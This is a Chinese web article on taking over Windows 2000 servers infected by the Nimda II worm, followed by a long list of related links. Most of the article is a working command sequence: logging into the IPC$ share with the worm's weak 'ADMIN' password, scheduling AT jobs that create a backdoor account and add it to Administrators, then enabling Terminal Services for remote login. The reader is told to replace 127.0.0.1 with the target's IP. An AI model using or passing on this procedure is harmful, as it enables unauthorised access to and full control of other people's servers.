| 添加到收藏夹 | 返回目录页 | 上一篇:黑国内一黑客站点主机的过程 |
利用尼姆达II病毒提升自己为系统管理员
在WINDOWS 2000的网络命令家族中,NET命令集和AT远程执行工具是最好的工具!
目前,尼姆达II病毒仍然在互联网络上广为流传!
我们就利用尼姆达II给我们带来的漏洞!
结合NET命令集和AT远程执行工具把自己提升为系统管理员吧!
首先,需要你的电脑上安装有Windows 2000 Server OR Professional
其次,我们进入CMD(Windows 2000的命令提示符)
(不知道如何进入命令提示符?)
单击开始按钮,选择运行……,输入CMD,然后回车
会看到一个窗口(DOS状态的)
C:\>NET USE \\127.0.0.1\IPC$ "ADMIN" /USER:"ADMIN"
命令成功完成
C:\>NET USE X: \\127.0.0.1\C$
命令成功完成
C:\>NET TIME \\127.0.0.1 /SET
是否与\\127.0.0.1的时间一致?[Y/N]Y
命令成功完成
C:\>AT \\127.0.0.1 18:00 C:\WINNT\SYSTEM32\NET.EXE USER hack521 123 /ADD
计划成功添加 ID=1
C:\>AT \\127.0.0.1 18:02 C:\WINNT\SYSTEM32\NET.EXE LOCALGROUP Administrators hack521 /ADD
计划成功添加 ID=2
OK 我来解释一下!
127.0.0.1是你本地的IP地址(没有上网的时候),具体实战的时候替换成对方的网络IP!
"ADMIN" /USER:"ADMIN" 这个是尼姆达II病毒制造的弱口令!权限为SYSTEM!
NET TIME \\127.0.0.1 /SET 将本地时间与服务器时间同步!
两行AT命令是分别在18:00与18:02执行服务器的两个NET命令
前一个是创建一个用户,后面的是将用户提升为系统管理员
这样,我们以后就可以用hack521这个用户访问这台服务器了!
黑客的目的不仅仅是要提升自己为系统管理员而已,还要完全控制整台服务器!
我们仍然在命令提示符下面(CMD状态)
C:\>COPY CON hack.bat
@ECHO TSEnable = on > C:\sql^Z
1 个文件拷贝完成
C:\>COPY hack.bat X:1 个文件拷贝完成
C:\>AT \\127.0.0.1 18:30 C:\hack.bat
计划成功添加 ID=1
C:\>AT \\127.0.0.1 18:32 C:\WINNT\SYSTEM32\sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
计划成功添加 ID=1
c:\>
OK 我来解释一下!
COPY CON hack.bat是创建一个批处理,输入命令的时候一定要小心,错了就得重新来一遍!
(如果notepad使用熟练的话,可以使用notepad编辑)
X:是映射的本地驱动器,盘符是自己定义的(不与本地驱动器同名即可)
两行AT命令是分别在18:30与18:32执行服务器的两个外部程序
前一个是执行我们创建的那个批处理程序,后面的是调用系统服务管理,启动远程管理功能
执行后,你不要着急连接远程管理功能,因为服务器正在重新启动中,得等一段时间!
大约5-6分钟以后,就可以使用了!
使用WinCtrl软件(关于WinCtrl的使用方法,看软件的帮助)连接上服务器!
当看到登录屏幕的时候,使用刚才创建的hack521用户登录吧!
最热门文章推荐:
>· 网站推广文章
>· 网站推广心得
>· 跑跑卡丁车教程
>· 跑跑卡丁车连喷教程
>· 网站制作工具
>· 制作网站的软件
>· opengl是什么
>· cs不支持opengl
下一篇:企业网安全从边界做起
↓相关文章:
- · 企业网安全从边界做起
- · 如何突破各种防火墙的防护
- · 了解数字证书
- · 超越技术视野的中国信息安全应急体系
- · 病毒防治的原理比较
- · 硬盘保护卡的破解
- · 动态ARP可导致整个TCP/IP网络中断
- · 密码学简介
- · KV3000修复硬盘数据办法!!
- · 利用mpd搭建基于PPTP协议的企业级VPN
- · 网络攻击的六大趋势
- · 剖析入侵检测系统的安全性
- · 网上银行的安全性分析
- · 局域网的维护之网络安全
- · Linux系统中的防火墙技术及其应用
- · 关闭危险之门,防止黑客入侵
- · IT主管:网络安全从哪入手?
- · 三招助您简化网络安全
- · 电信业网络安全综合解决方案
- · Juniper网络安全方案餐饮连锁店应用
- · SecurityGateway3.0垃圾邮件的清道夫
- · WebShield和SpamKiller3000安全解决方案
- · 国税系统网络安全解决方案
- · 如何加强政府网络的全方位安全性?
- · 构建铜墙铁壁式的企业网络
- · 安全简单实用
- · 某市电信局网络安全解决方案
- · ICMP路由通告的安全问题描述及解决措施
- · 中国人民银行在广域网下的防病毒方案
- · 对安全项目的规划与管理
- · 银行网络安全系统技术方案
- · 网络安全与系统稳定性保障的解决方案
- · “网络巡警”保安全
- · 将安全触角延伸到每一角落——晓通网络商务楼用户宽带接入安全解决方案
- · 建筑立体防毒网——McAfee银行业防病毒方案
- · FENSTS网络安全整体解决方案
- · 政府上网,安全第一
- · 税务系统网络安全解决方案
- · 银行网络安全解决方案
- · 证券行业网络安全解决方案
- · 金融网络的安全分析及设计
- · 如何加强政府网络的安全
- · 网络安全综合解决方案
- · 趋势科技校园网安全方案
- · MiKey在网络办公中的安全解决方案
- · iGate易门访问控制安全解决方案
- · 瑞星专业化网络安全解决方案概述
- · 中联通讯信息安全体系之VPN解决方案
- · 网络安全整体解决方案
- · 格方网上银行系统安全解决方案
- · 电信行业网络安全解决方案(二)
- · 电信行业网络安全解决方案(一)
- · 江苏电信IP网网络安全解决方案
- · “黑客煞星”实现静态与动态平衡
- · 国内黑客高手的联系方法
- · 企业网安全分析
- · 防毒因模式而异
- · 如何选择防病毒系统
- · 安全方案面面观
- · 安全统一管理方案一览
- · 网络广告的优势与特点
- · 如何让你的网络广告更有效——网络广告策划策略探索
- · 网络广告效果已被认可发展前景颇为乐观
- · 3721上网助手拦截全部广告提升上网速度
- · 2003年中国网络广告十大盘点
- · 炼狱里的网络广告
- · 网络广告成大公司新宠05年将达80亿
- · 分析:2004弹出式广告已到生死关头
- · 弹出广告,效果才是硬道理?
- · 网络广告何时不再侵犯网民
- · 网络广告策划过程
- · 网络广告业的四大希望
- · 网络广告五步曲
- · 提高网络广告效果九要诀
- · 网络广告技巧
- · 网络广告的优势
- · 网络广告应如何计价
- · 如何让广告语深入人心
- · 捆绑”网络广告
- · 成功登录著名搜索引擎Yahoo!的技巧

